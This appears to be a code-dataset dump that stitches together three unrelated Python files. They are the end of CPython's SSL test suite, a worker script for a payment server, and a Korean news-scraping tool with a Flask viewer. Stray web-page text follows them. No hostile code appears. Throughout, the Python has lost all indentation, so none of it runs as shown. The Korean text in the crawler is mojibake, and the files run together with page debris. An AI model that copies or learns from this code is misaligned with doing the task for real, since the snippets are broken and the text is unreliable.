def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with support.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
worker.py
|
import asyncio
import signal
import sys
from multiprocessing import Process
from api import events, invoices
from api import settings as settings_module
from api import tasks
from api.ext import backups as backup_ext
from api.ext import configurator as configurator_ext
from api.ext import tor as tor_ext
from api.ext import update as update_ext
from api.logserver import main as start_logserver
from api.logserver import wait_for_port
from api.settings import Settings
from api.utils.common import run_repeated
async def main():
settings = settings_module.settings_ctx.get()
await settings_module.init()
settings_module.log_startup_info()
await tor_ext.refresh(log=False) # to pre-load data for initial requests
await update_ext.refresh()
await configurator_ext.refresh_pending_deployments()
await backup_ext.manager.start()
asyncio.ensure_future(run_repeated(tor_ext.refresh, 60 * 10, 10))
asyncio.ensure_future(run_repeated(update_ext.refresh, 60 * 60 * 24))
settings.manager.add_event_handler("new_payment", invoices.new_payment_handler)
settings.manager.add_event_handler("new_block", invoices.new_block_handler)
await invoices.create_expired_tasks() # to ensure invoices get expired actually
coro = events.start_listening(tasks.event_handler) # to avoid deleted task errors
asyncio.ensure_future(coro)
await settings.manager.start_websocket(reconnect_callback=invoices.check_pending, force_connect=True)
def handler(signum, frame):
process.terminate()
sys.exit()
if __name__ == "__main__":
settings = Settings()
try:
token = settings_module.settings_ctx.set(settings)
process = Process(target=start_logserver)
process.start()
wait_for_port()
signal.signal(signal.SIGINT, handler)
asyncio.run(main())
finally:
settings_module.settings_ctx.reset(token)
|
main.py
|
from multiprocessing import Process, Manager
import os,webbrowser,requests,json,time,re
from bs4 import BeautifulSoup as bs
from collections import OrderedDict
from flask import Flask, redirect, render_template
from pystray import MenuItem as item
import pystray
from PIL import Image
class Croler:
runingObjects = []
def __init__(self,key,url):
self.newsDic = OrderedDict()
self.key = key
self.url = url
def main(self):
try:
header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"}
while True:
try:
res = requests.get(self.url, headers=header)
break
except:
continue
b = res.text
soup = bs(b,"html.parser")
newsList = soup.select_one("#main_content > div.list_body.newsflash_body > ul.type06_headline")
newsA = newsList.select("a")
for i in range(len(newsA)) :
while True:
try:
res_ = requests.get(newsA[i]["href"],headers=header)
break
except:
continue
newses = res_.text
soup_ = bs(newses,"html.parser")
inner = soup_.select_one('#articleBodyContents')
try:
if not self.newsDic[newsA[i]]:
continue
if not inner :
continue
else:
self.newsDic[newsA[i].get_text().replace("\t","").replace("\n","").replace("\""," ").replace("\'"," ")] = inner.get_text().replace("\n\n\n\n\n// flash ์ค๋ฅ๋ฅผ ์ฐํํ๊ธฐ ์ํ ํจ์ ์ถ๊ฐ\nfunction _flash_removeCallback()","").replace("\n","").replace("\""," ").replace("\'"," ")+"|"+newsA[i]["href"]
except:
self.newsDic[newsA[i].get_text().replace("\t","").replace("\n","").replace("\""," ").replace("\'"," ")] = inner.get_text().replace("\n\n\n\n\n// flash ์ค๋ฅ๋ฅผ ์ฐํํ๊ธฐ ์ํ ํจ์ ์ถ๊ฐ\nfunction _flash_removeCallback()","").replace("\n","").replace("\""," ").replace("\'"," ")+"|"+newsA[i]["href"]
except Exception as e:
print(self.key," : ",e)
self.main()
def totxt(self):
for i in self.newsDic.copy().keys():
if i == "": continue
try:
inner = OrderedDict()
inner[self.key] = i+" | "+self.newsDic[i].replace("\t","").replace("{}","")
i_ = re.sub('[\/:*?"<>|โโ~]',' ',i)
if not os.path.exists(f"./data/{self.key}"):
os.mkdir(""f"./data/{self.key}")
with open(f'./data/{self.key}/{i_}.json','x', encoding="utf-8") as f:
json.dump(inner,f,ensure_ascii=False)
except:
self.newsDic.move_to_end(i)
self.newsDic.pop(i)
def loop(self,p):
p[self.key] = self
print(p)
while True:
for i in range(5):
self.main()
time.sleep(180)
self.totxt()
def stop(self):
exit()
app = Flask(__name__)
@app.route("/")
def main_():
print(obs)
return render_template("main.html",test="test",list_ = obs)
@app.route("/<name>")
def lobby(name):
try:
return render_template("lobby.html",filelist = os.listdir(f"./data/{name}"))
except:
return redirect("/")
@app.route("/kill/<name>")
def killer(name):
try:
obs[name].stop()
obs.pop(name)
return redirect("/")
except Exception as e:
print("fail", e)
return redirect("/")
def flaskmain(q):
global obs
obs = q
app.run(host="127.0.0.1", port="2022")
def showfile():
webbrowser.open_new_tab("http://127.0.1:2022")
def stop():
icon_.stop()
exit(0)
def main():
image = Image.open("./data/img/trayimg.jpg")
menu = (item("showFiles",showfile),item("exit",stop))
global icon_
icon_ = pystray.Icon('name',image,"ํ๋ธ ์์ง๊ธฐ",menu)
with open("./data/setting/crol_setting.json","r") as f:
global targetList
targetList = json.load(f)["targetList"]
for i in targetList.keys():
ob = Croler(i,targetList[i])
p = Process(target=ob.loop, args=(runingObjects,), daemon=True)
p.start()
Fp = Process(target=flaskmain,args=(runingObjects,) , daemon=True)
Fp.start()
icon_.run()
if __name__ == "__main__":
man = Manager()
runingObjects = man.dict()
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.